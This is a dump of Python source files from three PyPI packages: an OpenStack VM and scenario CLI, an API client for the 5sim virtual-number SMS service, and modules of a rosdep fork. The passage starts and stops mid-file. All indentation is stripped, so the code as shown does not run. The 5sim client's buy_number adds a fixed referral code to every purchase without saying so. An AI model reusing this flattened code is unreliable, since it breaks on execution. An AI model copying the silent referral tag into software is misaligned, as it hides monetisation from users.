'prefix_name': params['name'],
'private_net_cidr': '192.168.250.0/24',
'private_net_gateway': '192.168.250.1',
'private_net_pool_start': '192.168.250.10',
'private_net_pool_end': '192.168.250.250'
})
uid = stack['stack']['id']
stack = self.heat.stacks.get(stack_id=uid).to_dict()
while stack['stack_status'] == 'CREATE_IN_PROGRESS':
progress()
stack = self.heat.stacks.get(stack_id=uid).to_dict()
time.sleep(3)
if stack['stack_status'] == 'CREATE_COMPLETE':
progress(result="DONE")
for it in stack['outputs']:
print "{key}: {val}".format(key=it['output_key'], val=it['output_value'])
print "Stack succesfully created."
else:
progress(result="FAIL")
die("Stack fall to unknow status: {}".format(stack))
def __get_count_free_ip(self, net, flist):
address_size = 32
ip_pool_mask = int(net['name'].split("/")[1])
ip_pool_bit_size = address_size - ip_pool_mask
max_pool_size = 2 ** ip_pool_bit_size - 2
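        # worked example: a /24 pool leaves 32 - 24 = 8 host bits, i.e. 2 ** 8 - 2 = 254 assignable addresses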
return max_pool_size - len([ip_addr for ip_addr in flist if
ip_addr.pool == net['name'] and ip_addr.instance_id])
def get_network(self):
max_network_space = 0
current_biggest_network = None
flist = self.nova.floating_ips.list()
for net in self.neutron.list_networks()['networks']:
if net.get('router:external') and len(net.get('subnets')) > 0:
network_free_space = self.__get_count_free_ip(net, flist)
if network_free_space > max_network_space:
max_network_space = network_free_space
current_biggest_network = net
return (current_biggest_network, max_network_space)
def help(self):
print """
Usage: 5minute scenarios boot [PARAM] <TEMPLATE-NAME>
         Boot a new scenario
PARAM:
-n, --name Name of scenario
<TEMPLATE-NAME> The name of template
Examples:
5minute scenarios boot template1
5minute scenarios boot --name myscenario template1
"""
class ListScenarioClass(ScenarioClass):
def cmd(self, argv):
filter = None
if len(argv) == 0:
filter = "%s-" % USER
else:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
elif argv[0] not in ('--all', '-a'):
filter = argv[0]
self.list_scenarios(filter)
@catch_exception("The problem with getting of the list of scenarios.")
def list_scenarios(self, filter):
scenarios = self.heat.stacks.list(search_opts={"name": filter})
x = PrettyTable(["Name", "ID", "Status", "Template"])
x.align["Name"] = "l"
x.align["Template"] = "l"
for ins in scenarios:
row = [ins.stack_name, ins.id, ins.stack_status, ins.description.split("\n", 1)[0][0:20]]
x.add_row(row)
print x.get_string(sortby="Name")
def help(self):
print """
Usage: 5minute scenarios list [PARAM]
Show the list of scenarios. By default, it shows only your scenarios.
PARAM:
-a, --all show all accessible scenarios
             <REGEXP>     a regular expression can be used to filter the results
Examples:
5minute scenarios list
5minute scenarios list --all
5minute scenarios list satellite-infrastructure
"""
class DeleteScenarioClass(ScenarioClass):
"""
    This is only a view on the ScenarioClass for deleting a scenario.
"""
def cmd(self, argv):
if len(argv) == 0:
die("Missing parameter. Please try 5minute scenario delete <name|id>.")
else:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
else:
self.kill_scenario(argv[0])
@catch_exception("The problem with deleting of the scenario.")
def kill_scenario(self, id):
scenario = self.get_scenario(id)
scenario.delete()
def help(self):
print """
Usage: 5minute scenarios (del|kill|delete) <NAME|ID>
Delete scenario.
PARAM:
<NAME|ID> The name of the scenario
Examples:
5minute scenarios delete 5minute-RHEL6
5minute scenarios kill 5minute-RHEL6
"""
# -----------------------------------------------------------
# Manuals
# -----------------------------------------------------------
def main(argv):
if 'novaclient' not in sys.modules:
die("Please install python-novaclient (maybe 'yum -y install python-novaclient'?)")
if 'xmltodict' not in sys.modules:
die("Please install python-xmltodict (maybe 'yum -y install python-xmltodict'?)")
cmd = None
if len(argv) > 0:
cmd = argv.pop(0)
if cmd in ('--debug', '-d'):
global DEBUG
DEBUG = True
if len(argv) > 0:
cmd = argv.pop(0)
if cmd is None or cmd in ('help', '--help', '-h'):
BaseClass().cmd(argv)
elif cmd == 'key':
KeyClass().cmd(argv)
elif cmd == 'images':
ImagesClass().cmd(argv)
elif cmd == 'flavors':
FlavorClass().cmd(argv)
elif cmd == 'list':
ListInstancesClass().cmd(argv)
elif cmd in ('del', 'delete', 'kill'):
DeleteInstanceClass().cmd(argv)
elif cmd == 'boot':
BootInstanceClass().cmd(argv)
elif cmd in ('scenario', 'scenarios'):
scmd = None
if len(argv) > 0:
scmd = argv.pop(0)
ScenarioClass.getInstance(scmd).cmd(argv)
if __name__ == "__main__":
main(sys.argv[1:]) | 5minute | /5minute-0.2.1.tar.gz/5minute-0.2.1/vminute/vminute.py | vminute.py |
import requests
import json
from fivesim.errors import *
class FiveSim:
def __init__(self, api_key, proxy):
self.__api_key = api_key
self.__proxy = proxy
self.__session = requests.Session()
self.__auth_url: str = "https://5sim.net/v1/user/"
self.__guest_url: str = "https://5sim.net/v1/guest/"
self.__vendor_url: str = "https://5sim.net/v1/vendor/"
self.__session.headers = {
"Authorization": f"Bearer {self.__api_key}",
"Accept": "application/json"
}
def __request(self, method, url):
try:
if method == "GET":
resp = self.__session.get(url, proxies=self.__proxy)
if resp.status_code == 401:
raise ApiKeyInvalidError
if resp.status_code == 400:
raise BadRequests(resp.text)
if resp.text == "no free phones":
raise NoPhoneNumberError("No number in stock")
if resp.text == "not enough user balance":
raise LowBalanceError("Not enough balance")
try:
return json.loads(resp.text)
except json.JSONDecodeError:
return resp.text
except Exception as e:
raise e
def get_country_list(self) -> dict:
return self.__request("GET", f"{self.__guest_url}countries")
def product_requests(self, country: str, operator: str) -> dict:
return self.__request("GET", f"{self.__guest_url}products/{country}/{operator}")
def price_requests(self) -> dict:
return self.__request("GET", f"{self.__guest_url}prices")
def price_requests_by_country(self, country: str) -> dict:
return self.__request("GET", f"{self.__guest_url}prices?country={country}")
def price_requests_by_product(self, product: str) -> dict:
return self.__request("GET", f"{self.__guest_url}prices?product={product}")
def price_requests_by_country_and_product(self, country: str, product: str) -> dict:
return self.__request("GET", f"{self.__guest_url}prices?country={country}&product={product}")
def get_balance(self) -> dict:
return self.__request("GET", f"{self.__auth_url}profile")
def buy_number(self, country: str, operator: str, product: str) -> dict:
return self.__request("GET", f"{self.__auth_url}buy/activation/{country}/{operator}/{product}?ref=3b612d3c")
def buy_hosting_number(self, country: str, operator: str, product: str) -> dict:
return self.__request("GET", f"{self.__auth_url}buy/hosting/{country}/{operator}/{product}")
def rebuy_number(self, product: str, number: str) -> dict:
return self.__request("GET", f"{self.__auth_url}reuse/{product}/{number}")
def check_order(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}check/{order_id}")
def finish_order(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}finish/{order_id}")
def cancel_order(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}cancel/{order_id}")
def ban_order(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}ban/{order_id}")
def sms_inbox_list(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}sms/inbox/{order_id}")
def btc_and_ltc_rates(self, currency: str) -> dict:
return self.__request("GET", f"{self.__auth_url}payment/crypto/rates?currency={currency}")
def address_payment(self, currency: str) -> dict:
return self.__request("GET", f"{self.__auth_url}payment/crypto/getaddress?currency={currency}")
def get_notifications(self, lang: str) -> dict:
return self.__request("GET", f"{self.__guest_url}flash/{lang}")
def vendor_statics(self) -> dict:
return self.__request("GET", f"{self.__auth_url}vendor")
def wallet_reverse(self) -> dict:
return self.__request("GET", f"{self.__vendor_url}wallets") | 5sim-python | /5sim_python-1.0.3-py3-none-any.whl/fivesim/client.py | client.py |
from __future__ import print_function
import os
from subprocess import Popen, PIPE, CalledProcessError
from . import create_default_installer_context
from .lookup import RosdepLookup
from .platforms.debian import APT_INSTALLER
from .platforms.osx import BREW_INSTALLER
from .platforms.pip import PIP_INSTALLER
from .platforms.redhat import YUM_INSTALLER
from .platforms.freebsd import PKG_INSTALLER
from .rep3 import download_targets_data
from .rosdistrohelper import get_targets
from .rospkg_loader import DEFAULT_VIEW_KEY
from .sources_list import get_sources_list_dir, DataSourceMatcher, SourcesListLoader
class ValidationFailed(Exception):
pass
def call(command, pipe=None):
"""
Copy of call() function from catkin-generate-debian to mimic output
"""
working_dir = '.'
# print('+ cd %s && ' % working_dir + ' '.join(command))
process = Popen(command, stdout=pipe, stderr=pipe, cwd=working_dir)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
raise CalledProcessError(retcode, command)
if pipe:
return output
def get_ubuntu_targets(rosdistro):
"""
Get a list of Ubuntu distro codenames for the specified ROS
distribution. This method blocks on an HTTP download.
:raises: :exc:`ValidationFailed`
"""
targets_data = get_targets()
legacy_targets = download_targets_data()
if 'fuerte' in legacy_targets:
targets_data['fuerte'] = {'ubuntu': legacy_targets['fuerte']}
if 'electric' in legacy_targets:
targets_data['electric'] = {'ubuntu': legacy_targets['electric']}
return targets_data[rosdistro]['ubuntu']
def get_installer(installer_name):
""" Expected installers APT_INSTALLER, YUM_INSTALLER, ..."""
installer_context = create_default_installer_context()
return installer_context.get_installer(installer_name)
def resolve_for_os(rosdep_key, view, installer, os_name, os_version):
"""
Resolve rosdep key to dependencies.
:param os_name: OS name, e.g. 'ubuntu'
:raises: :exc:`rosdep2.ResolutionError`
"""
d = view.lookup(rosdep_key)
ctx = create_default_installer_context()
os_installers = ctx.get_os_installer_keys(os_name)
default_os_installer = ctx.get_default_os_installer_key(os_name)
inst_key, rule = d.get_rule_for_platform(os_name, os_version, os_installers, default_os_installer)
assert inst_key in os_installers
return installer.resolve(rule)
def update_rosdep():
call(('rosdep', 'update'), pipe=PIPE)
def get_catkin_view(rosdistro_name, os_name, os_version, update=True):
"""
:raises: :exc:`ValidationFailed`
"""
sources_list_dir = get_sources_list_dir()
if not os.path.exists(sources_list_dir):
raise ValidationFailed("""rosdep database is not initialized, please run:
\tsudo rosdep init
""")
if update:
update_rosdep()
sources_matcher = DataSourceMatcher([rosdistro_name, os_name, os_version])
sources_loader = SourcesListLoader.create_default(matcher=sources_matcher)
if not (sources_loader.sources):
raise ValidationFailed("""rosdep database does not have any sources.
Please make sure you have a valid configuration in:
\t%s
""" % (sources_list_dir))
    # for vestigial reasons, using the rospkg loader, but we're only
# actually using the backend db as resolution is not resource-name based
lookup = RosdepLookup.create_from_rospkg(sources_loader=sources_loader)
return lookup.get_rosdep_view(DEFAULT_VIEW_KEY) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/catkin_support.py | catkin_support.py |
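# Illustrative sketch of how these helpers compose (the rosdep key 'boost', the distro and
# the OS values are placeholders, and resolution requires an initialized rosdep database):
#
#     apt_installer = get_installer(APT_INSTALLER)
#     view = get_catkin_view('noetic', 'ubuntu', 'focal', update=False)
#     debian_packages = resolve_for_os('boost', view, apt_installer, 'ubuntu', 'focal')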
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
import yaml
try:
import urlparse
except ImportError:
import urllib.parse as urlparse # py3k
import os
from rospkg.os_detect import OS_DEBIAN
from rospkg.os_detect import OS_FEDORA
from rospkg.os_detect import OS_OSX
from rospkg.os_detect import OS_UBUNTU
from .core import InvalidData, DownloadFailure
from .platforms.debian import APT_INSTALLER
from .platforms.osx import BREW_INSTALLER
from .platforms.redhat import YUM_INSTALLER
from .rosdistrohelper import get_targets, get_release_file, PreRep137Warning
from .rep3 import download_targets_data # deprecated, will output warning
import warnings
create_default_installer_context = None
# py3k
try:
unicode
except NameError:
basestring = unicode = str
# location of an example gbpdistro file for reference and testing
FUERTE_GBPDISTRO_URL = 'https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro/' \
    'master/releases/fuerte.yaml'
# seconds to wait before aborting download of gbpdistro data
DOWNLOAD_TIMEOUT = 15.0
def get_owner_name(url):
"""
Given a gbpdistro url, returns the name of the github user in the url.
If the url is not a valid github url it returns the default `ros`.
This information is used to set the homebrew tap name, see:
https://github.com/ros-infrastructure/rosdep/pull/17
:returns: The github account in the given gbpdistro url
"""
result = 'ros'
try:
parsed = urlparse.urlparse(url)
if parsed.netloc == 'github.com':
result = parsed.path.split('/')[1]
except (ValueError, IndexError):
pass
return result
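# For example (illustrative):
#     get_owner_name('https://github.com/ros-infrastructure/rosdep/pull/17') -> 'ros-infrastructure'
#     get_owner_name('https://example.com/foo/bar') -> 'ros' (fallback for non-GitHub urls)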
# For compatibility url defaults to ''
def gbprepo_to_rosdep_data(gbpdistro_data, targets_data, url=''):
"""
DEPRECATED: the rosdistro file format has changed according to REP137
this function will yield a deprecation warning
:raises: :exc:`InvalidData`
"""
warnings.warn('deprecated: see REP137 and rosdistro', PreRep137Warning)
# Error reporting for this isn't nearly as good as it could be
# (e.g. doesn't separate gbpdistro vs. targets, nor provide
# origin), but rushing this implementation a bit.
try:
if not type(targets_data) == dict:
raise InvalidData('targets data must be a dict')
if not type(gbpdistro_data) == dict:
raise InvalidData('gbpdistro data must be a dictionary')
if gbpdistro_data['type'] != 'gbp':
raise InvalidData('gbpdistro must be of type "gbp"')
# compute the default target data for the release_name
release_name = gbpdistro_data['release-name']
if release_name not in targets_data:
raise InvalidData('targets file does not contain information '
'for release [%s]' % (release_name))
else:
# take the first match
target_data = targets_data[release_name]
# compute the rosdep data for each repo
rosdep_data = {}
gbp_repos = gbpdistro_data['repositories']
# Ensure gbp_repos is a dict
if type(gbp_repos) != dict:
raise InvalidData('invalid repo spec in gbpdistro data: ' + str(gbp_repos) +
'. Invalid repositories entry, must be dict.')
for rosdep_key, repo in gbp_repos.items():
if type(repo) != dict:
raise InvalidData('invalid repo spec in gbpdistro data: ' +
str(repo))
for pkg in repo.get('packages', {rosdep_key: None}):
rosdep_data[pkg] = {}
# for pkg in repo['packages']: indent the rest of the lines here.
# Do generation for ubuntu
rosdep_data[pkg][OS_UBUNTU] = {}
# Do generation for empty OS X entries
homebrew_name = '%s/%s/%s' % (get_owner_name(url),
release_name, rosdep_key)
rosdep_data[pkg][OS_OSX] = {
BREW_INSTALLER: {'packages': [homebrew_name]}
}
# - debian package name: underscores must be dashes
deb_package_name = 'ros-%s-%s' % (release_name, pkg)
deb_package_name = deb_package_name.replace('_', '-')
repo_targets = repo['target'] if 'target' in repo else 'all'
if repo_targets == 'all':
repo_targets = target_data
for t in repo_targets:
if not isinstance(t, basestring):
raise InvalidData('invalid target spec: %s' % (t))
rosdep_data[pkg][OS_UBUNTU][t] = {
APT_INSTALLER: {'packages': [deb_package_name]}
}
rosdep_data[pkg]['_is_ros'] = True
return rosdep_data
except KeyError as e:
raise InvalidData('Invalid GBP-distro/targets format: missing key: ' +
str(e))
# REP137 compliant
def get_gbprepo_as_rosdep_data(gbpdistro):
"""
:raises: :exc:`InvalidData`
"""
distro_file = get_release_file(gbpdistro)
ctx = create_default_installer_context()
release_name = gbpdistro
rosdep_data = {}
default_installers = {}
gbp_repos = distro_file.repositories
for rosdep_key, repo in gbp_repos.items():
for pkg in repo.package_names:
rosdep_data[pkg] = {}
# following rosdep pull #17, use env var instead of github organization name
tap = os.environ.get('ROSDEP_HOMEBREW_TAP', 'ros')
# Do generation for empty OS X entries
homebrew_name = '%s/%s/%s' % (tap, release_name, rosdep_key)
rosdep_data[pkg][OS_OSX] = {
BREW_INSTALLER: {'packages': [homebrew_name]}
}
# - package name: underscores must be dashes
package_name = 'ros-%s-%s' % (release_name, pkg)
package_name = package_name.replace('_', '-')
for os_name in distro_file.platforms:
if os_name not in rosdep_data[pkg]:
rosdep_data[pkg][os_name] = {}
if os_name not in default_installers:
default_installers[os_name] = ctx.get_default_os_installer_key(os_name)
for os_code_name in distro_file.platforms[os_name]:
rosdep_data[pkg][os_name][os_code_name] = {
default_installers[os_name]: {'packages': [package_name]}
}
rosdep_data[pkg]['_is_ros'] = True
return rosdep_data
def download_gbpdistro_as_rosdep_data(gbpdistro_url, targets_url=None):
"""
Download gbpdistro file from web and convert format to rosdep distro data.
DEPRECATED: see REP137. This function will output
(at least) one deprecation warning
:param gbpdistro_url: url of gbpdistro file, ``str``
:param target_url: override URL of platform targets file
:raises: :exc:`DownloadFailure`
:raises: :exc:`InvalidData` If targets file does not pass cursory
validation checks.
"""
# we can convert a gbpdistro file into rosdep data by following a
# couple rules
# will output a warning
targets_data = download_targets_data(targets_url=targets_url)
try:
f = urlopen(gbpdistro_url, timeout=DOWNLOAD_TIMEOUT)
text = f.read()
f.close()
gbpdistro_data = yaml.safe_load(text)
# will output a warning
return gbprepo_to_rosdep_data(gbpdistro_data,
targets_data,
gbpdistro_url)
except Exception as e:
raise DownloadFailure('Failed to download target platform data '
'for gbpdistro:\n\t' + str(e)) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/gbpdistro_support.py | gbpdistro_support.py |
import hashlib
import os
import tempfile
from .core import CachePermissionError
try:
import cPickle as pickle
except ImportError:
import pickle
PICKLE_CACHE_EXT = '.pickle'
def compute_filename_hash(key_filenames):
sha_hash = hashlib.sha1()
if isinstance(key_filenames, list):
for key in key_filenames:
sha_hash.update(key.encode())
else:
sha_hash.update(key_filenames.encode())
return sha_hash.hexdigest()
def write_cache_file(source_cache_d, key_filenames, rosdep_data):
"""
:param source_cache_d: directory to write cache file to
:param key_filenames: filename (or list of filenames) to be used in hashing
    :param rosdep_data: dictionary of data to serialize (stored as a pickle)
:returns: name of file where cache is stored
:raises: :exc:`OSError` if cannot write to cache file/directory
:raises: :exc:`IOError` if cannot write to cache file/directory
"""
if not os.path.exists(source_cache_d):
os.makedirs(source_cache_d)
key_hash = compute_filename_hash(key_filenames)
filepath = os.path.join(source_cache_d, key_hash)
try:
write_atomic(filepath + PICKLE_CACHE_EXT, pickle.dumps(rosdep_data, 2), True)
except OSError as e:
raise CachePermissionError('Failed to write cache file: ' + str(e))
try:
os.unlink(filepath)
except OSError:
pass
return filepath
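# Illustrative usage sketch (paths and data are placeholders): the cache entry is stored
# under a filename derived from the SHA-1 hash of the source filenames, e.g.
#
#     path = write_cache_file('/tmp/rosdep_cache', ['20-default.list'], {'foo': {}})
#     # path == '/tmp/rosdep_cache/' + compute_filename_hash(['20-default.list'])
#     # and the pickled data lives in path + PICKLE_CACHE_EXT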
def write_atomic(filepath, data, binary=False):
# write data to new file
fd, filepath_tmp = tempfile.mkstemp(prefix=os.path.basename(filepath) + '.tmp.', dir=os.path.dirname(filepath))
if (binary):
fmode = 'wb'
else:
fmode = 'w'
with os.fdopen(fd, fmode) as f:
f.write(data)
f.close()
try:
# switch file atomically (if supported)
os.rename(filepath_tmp, filepath)
except OSError:
# fall back to non-atomic operation
try:
os.unlink(filepath)
except OSError:
pass
try:
os.rename(filepath_tmp, filepath)
except OSError:
os.unlink(filepath_tmp) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/cache_tools.py | cache_tools.py |
# Author Tully Foote/[email protected], Ken Conley/[email protected]
from __future__ import print_function
import sys
import yaml
from collections import defaultdict
from rospkg import RosPack, RosStack, ResourceNotFound
from .core import RosdepInternalError, InvalidData, rd_debug
from .model import RosdepDatabase
from .rospkg_loader import RosPkgLoader
from .dependency_graph import DependencyGraph
from .sources_list import SourcesListLoader
from . import catkin_packages
class RosdepDefinition(object):
"""
Single rosdep dependency definition. This data is stored as the
raw dictionary definition for the dependency.
See REP 111, 'Multiple Package Manager Support for Rosdep' for a
discussion of this raw format.
"""
def __init__(self, rosdep_key, data, origin='<dynamic>'):
"""
:param rosdep_key: key/name of rosdep dependency
:param data: raw rosdep data for a single rosdep dependency, ``dict``
:param origin: string that indicates where data originates from (e.g. filename)
"""
self.rosdep_key = rosdep_key
if not isinstance(data, dict):
raise InvalidData('rosdep data for [%s] must be a dictionary' % (self.rosdep_key), origin=origin)
self.data = data
self.origin = origin
def reverse_merge(self, new_data, origin='<dynamic>', verbose=False):
"""
        Merge two definitions together, with existing rules taking precedence.
Definitions are merged at the os_name level, meaning that if two rules
exist with the same os_name, the first one wins.
:param data: raw rosdep data for a single rosdep dependency, ``dict``
:param origin: string that indicates where this new data comes from (e.g. filename)
"""
for os_name, rules in new_data.items():
if os_name not in self.data:
if verbose:
print('[%s] adding rules for os [%s] to [%s]' % (origin, os_name, self.rosdep_key), file=sys.stderr)
self.data[os_name] = rules
elif verbose:
print('[%s] ignoring [%s] for os [%s], already loaded' % (origin, self.rosdep_key, os_name), file=sys.stderr)
def get_rule_for_platform(self, os_name, os_version, installer_keys, default_installer_key):
"""
        Get installer_key and rule for the specified platform. See REP 111 for precedence rules.
:param os_name: OS name to get rule for
:param os_version: OS version to get rule for
:param installer_keys: Keys of installers for platform, ``[str]``
:param default_installer_key: Default installer key for platform, ``[str]``
:returns: (installer_key, rosdep_args_dict), ``(str, dict)``
:raises: :exc:`ResolutionError` If no rule is available
:raises: :exc:`InvalidData` If rule data is not valid
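        Example (illustrative sketch; the installer keys and package names are placeholders)::
            # with self.data == {'ubuntu': {'apt': {'packages': ['libfoo-dev']}}}
            # get_rule_for_platform('ubuntu', 'focal', ['apt', 'pip'], 'apt')
            # returns ('apt', {'packages': ['libfoo-dev']})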
"""
rosdep_key = self.rosdep_key
data = self.data
if type(data) != dict:
raise InvalidData('rosdep value for [%s] must be a dictionary' % (self.rosdep_key), origin=self.origin)
if os_name not in data:
raise ResolutionError(rosdep_key, data, os_name, os_version, 'No definition of [%s] for OS [%s]' % (rosdep_key, os_name))
data = data[os_name]
return_key = default_installer_key
# REP 111: rosdep first interprets the key as a
# PACKAGE_MANAGER. If this test fails, it will be interpreted
# as an OS_VERSION_CODENAME.
if type(data) == dict:
for installer_key in installer_keys:
if installer_key in data:
data = data[installer_key]
return_key = installer_key
break
else:
# data must be a dictionary, string, or list
if type(data) == dict:
# check for
# hardy:
# apt:
# stuff
# we've already checked for PACKAGE_MANAGER_KEY, so
# version key must be present here for data to be valid
# dictionary value.
# if the os_version is not defined and there is no wildcard
if os_version not in data and '*' not in data:
raise ResolutionError(rosdep_key, self.data, os_name, os_version, 'No definition of [%s] for OS version [%s]' % (rosdep_key, os_version))
# if the os_version has the value None
if os_version in data and data[os_version] is None:
raise ResolutionError(rosdep_key, self.data, os_name, os_version, '[%s] defined as "not available" for OS version [%s]' % (rosdep_key, os_version))
# if os version is not defined (and there is a wildcard) fallback to the wildcard
if os_version not in data:
os_version = '*'
data = data[os_version]
if type(data) == dict:
for installer_key in installer_keys:
if installer_key in data:
data = data[installer_key]
return_key = installer_key
break
# Check if the rule is null
if data is None:
raise ResolutionError(rosdep_key, self.data, os_name, os_version, '[%s] defined as "not available" for OS version [%s]' % (rosdep_key, os_version))
if type(data) not in (dict, list, type('str')):
raise InvalidData('rosdep OS definition for [%s:%s] must be a dictionary, string, or list: %s' % (self.rosdep_key, os_name, data), origin=self.origin)
return return_key, data
def __str__(self):
return '%s:\n%s' % (self.origin, yaml.dump(self.data, default_flow_style=False))
class ResolutionError(Exception):
def __init__(self, rosdep_key, rosdep_data, os_name, os_version, message):
self.rosdep_key = rosdep_key
self.rosdep_data = rosdep_data
self.os_name = os_name
self.os_version = os_version
super(ResolutionError, self).__init__(message)
def __str__(self):
if self.rosdep_data:
pretty_data = yaml.dump(self.rosdep_data, default_flow_style=False)
else:
pretty_data = '<no data>'
return """%s
\trosdep key : %s
\tOS name : %s
\tOS version : %s
\tData:\n%s""" % (self.args[0], self.rosdep_key, self.os_name, self.os_version, pretty_data.replace('\n', '\n\t\t'))
class RosdepView(object):
"""
View of :class:`RosdepDatabase`. Unlike :class:`RosdepDatabase`,
which stores :class:`RosdepDatabaseEntry` data for all stacks, a
view merges entries for a particular stack. This view can then be
queried to lookup and resolve individual rosdep dependencies.
"""
def __init__(self, name):
self.name = name
self.rosdep_defs = {} # {str: RosdepDefinition}
def __str__(self):
return '\n'.join(['%s: %s' % val for val in self.rosdep_defs.items()])
def lookup(self, rosdep_name):
"""
:returns: :class:`RosdepDefinition`
:raises: :exc:`KeyError` If *rosdep_name* is not declared
"""
return self.rosdep_defs[rosdep_name]
def keys(self):
"""
:returns: list of rosdep names in this view
"""
return self.rosdep_defs.keys()
def merge(self, update_entry, override=False, verbose=False):
"""
Merge rosdep database update into main database. Merge rules
are first entry to declare a key wins. There are no
conflicts. This rule logic is modelled after the apt sources
list.
:param override: Ignore first-one-wins rules and instead
always use rules from update_entry
"""
if verbose:
print('view[%s]: merging from cache of [%s]' % (self.name, update_entry.origin))
db = self.rosdep_defs
for dep_name, dep_data in update_entry.rosdep_data.items():
# convert data into RosdepDefinition model
update_definition = RosdepDefinition(dep_name, dep_data, update_entry.origin)
# First rule wins or override, no rule-merging.
if override or dep_name not in db:
db[dep_name] = update_definition
elif dep_name in db:
db[dep_name].reverse_merge(dep_data, update_entry.origin, verbose=verbose)
def prune_catkin_packages(rosdep_keys, verbose=False):
workspace_pkgs = catkin_packages.get_workspace_packages()
if not workspace_pkgs:
return rosdep_keys
for i, rosdep_key in reversed(list(enumerate(rosdep_keys))):
if rosdep_key in workspace_pkgs:
# If workspace packages listed (--catkin-workspace)
# and if the rosdep_key is a package in that
# workspace, then skip it rather than resolve it
if verbose:
print("rosdep key '{0}'".format(rosdep_key) +
' is in the catkin workspace, skipping.',
file=sys.stderr)
del rosdep_keys[i]
return rosdep_keys
def prune_skipped_packages(rosdep_keys, skipped_keys, verbose=False):
if not skipped_keys:
return rosdep_keys
for i, rosdep_key in reversed(list(enumerate(rosdep_keys))):
if rosdep_key in skipped_keys:
# If the key is in the list of keys to explicitly skip, skip it
if verbose:
print("rosdep key '{0}'".format(rosdep_key) +
' was listed in the skipped packages, skipping.',
file=sys.stderr)
del rosdep_keys[i]
return rosdep_keys
class RosdepLookup(object):
"""
Lookup rosdep definitions. Provides API for most
non-install-related commands for rosdep.
:class:`RosdepLookup` caches data as it is loaded, so changes made
on the filesystem will not be reflected if the rosdep information
has already been loaded.
"""
def __init__(self, rosdep_db, loader):
"""
:param loader: Loader to use for loading rosdep data by stack
name, ``RosdepLoader``
:param rosdep_db: Database to load definitions into, :class:`RosdepDatabase`
"""
self.rosdep_db = rosdep_db
self.loader = loader
self._view_cache = {} # {str: {RosdepView}}
self._resolve_cache = {} # {str : (os_name, os_version, installer_key, resolution, dependencies)}
# some APIs that deal with the entire environment save errors
# in to self.errors instead of raising them in order to be
# robust to single-stack faults.
self.errors = []
# flag for turning on printing to console
self.verbose = False
self.skipped_keys = []
def get_loader(self):
return self.loader
def get_errors(self):
"""
Retrieve error state for API calls that do not directly report
error state. This is the case for APIs like
:meth:`RosdepLookup.where_defined` that are meant to be
fault-tolerant to single-stack failures.
:returns: List of exceptions, ``[Exception]``
"""
return self.errors[:]
def get_rosdeps(self, resource_name, implicit=True):
"""
Get rosdeps that *resource_name* (e.g. package) requires.
:param implicit: If ``True``, include implicit rosdep
dependencies. Default: ``True``.
:returns: list of rosdep names, ``[str]``
"""
return self.loader.get_rosdeps(resource_name, implicit=implicit)
def get_resources_that_need(self, rosdep_name):
"""
:param rosdep_name: name of rosdep dependency
:returns: list of package names that require rosdep, ``[str]``
"""
return [k for k in self.loader.get_loadable_resources() if rosdep_name in self.get_rosdeps(k, implicit=False)]
@staticmethod
def create_from_rospkg(rospack=None, rosstack=None,
sources_loader=None,
verbose=False, dependency_types=None):
"""
Create :class:`RosdepLookup` based on current ROS package
environment.
:param rospack: (optional) Override :class:`rospkg.RosPack`
instance used to crawl ROS packages.
:param rosstack: (optional) Override :class:`rospkg.RosStack`
instance used to crawl ROS stacks.
:param sources_loader: (optional) Override SourcesLoader used
for managing sources.list data sources.
:param dependency_types: (optional) List of dependency types.
Allowed: {'build', 'buildtool', 'build_export', 'buildtool_export', 'exec', 'test', 'doc'}
"""
# initialize the loader
if rospack is None:
rospack = RosPack()
if rosstack is None:
rosstack = RosStack()
if sources_loader is None:
sources_loader = SourcesListLoader.create_default(verbose=verbose)
if dependency_types is None:
dependency_types = []
rosdep_db = RosdepDatabase()
# Use sources list to initialize rosdep_db. Underlay has no
# notion of specific resources, and its view keys are just the
# individual sources it can load from. SourcesListLoader
# cannot do delayed evaluation of OS setting due to matcher.
underlay_key = SourcesListLoader.ALL_VIEW_KEY
# Create the rospkg loader on top of the underlay
loader = RosPkgLoader(rospack=rospack, rosstack=rosstack,
underlay_key=underlay_key, dependency_types=dependency_types)
# create our actual instance
lookup = RosdepLookup(rosdep_db, loader)
# load in the underlay
lookup._load_all_views(loader=sources_loader)
# use dependencies to implement precedence
view_dependencies = sources_loader.get_loadable_views()
rosdep_db.set_view_data(underlay_key, {}, view_dependencies, underlay_key)
return lookup
def resolve_all(self, resources, installer_context, implicit=False):
"""
Resolve all the rosdep dependencies for *resources* using *installer_context*.
:param resources: list of resources (e.g. packages), ``[str]``
:param installer_context: :class:`InstallerContext`
:param implicit: Install implicit (recursive) dependencies of
resources. Default ``False``.
:returns: (resolutions, errors), ``([(str, [str])], {str: ResolutionError})``. resolutions provides
an ordered list of resolution tuples. A resolution tuple's first element is the installer
key (e.g.: apt or homebrew) and the second element is a list of opaque resolution values for that
installer. errors maps package names to an :exc:`ResolutionError` or :exc:`KeyError` exception.
:raises: :exc:`RosdepInternalError` if unexpected error in constructing dependency graph
:raises: :exc:`InvalidData` if a cycle occurs in constructing dependency graph
"""
depend_graph = DependencyGraph()
errors = {}
# TODO: resolutions dictionary should be replaced with resolution model instead of mapping (undefined) keys.
for resource_name in resources:
try:
rosdep_keys = self.get_rosdeps(resource_name, implicit=implicit)
if self.verbose:
print('resolve_all: resource [%s] requires rosdep keys [%s]' % (resource_name, ', '.join(rosdep_keys)), file=sys.stderr)
rosdep_keys = prune_catkin_packages(rosdep_keys, self.verbose)
rosdep_keys = prune_skipped_packages(rosdep_keys, self.skipped_keys, self.verbose)
for rosdep_key in rosdep_keys:
try:
installer_key, resolution, dependencies = \
self.resolve(rosdep_key, resource_name, installer_context)
depend_graph[rosdep_key]['installer_key'] = installer_key
depend_graph[rosdep_key]['install_keys'] = list(resolution)
